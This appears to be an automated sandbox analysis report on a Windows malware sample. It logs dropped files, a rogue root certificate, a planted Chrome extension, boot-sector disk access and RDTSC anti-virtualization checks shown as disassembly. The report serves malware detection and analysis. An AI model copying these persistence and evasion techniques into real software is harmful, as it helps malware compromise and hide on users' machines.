Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Cyfj6XGbkd.exeStatic file information: File size 4247224 > 1048576
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970637183.exe, 00000009.00000000.372796373.000000000040F000.00000002.00020000.sdmp, 1611970637183.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000012.00000000.397410202.000000000099C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIDCDD.tmp.1.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 2.2.56BB1610C0318054.exe.2810000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 4.2.56BB1610C0318054.exe.2560000.3.unpack
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408D68
Source: MSIDCDD.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x2d22
Source: Cyfj6XGbkd.exeStatic PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: 56BB1610C0318054.exe.0.drStatic PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_004038A0 push eax; ret 0_2_004038CE
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10010579 push ecx; ret 0_2_1001058C
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 1_2_046BD9FC pushfd ; iretd 1_2_046BD9FE
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10010579 push ecx; ret 2_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E2F1 push ecx; ret 9_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00993FB5 push ecx; ret 18_2_00993FC8

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DA70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D7E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D7E0
Installs new ROOT certificatesShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_user.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDCDD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Roaming\1611970637183.exeJump to dropped file
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\book.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\manifest.jsonJump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DA70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D7E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D7E0
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040C41D
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\1611970637183.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100204C00_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100204C02_2_100204C0
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC8256EAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FC82584Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825639h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825647h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
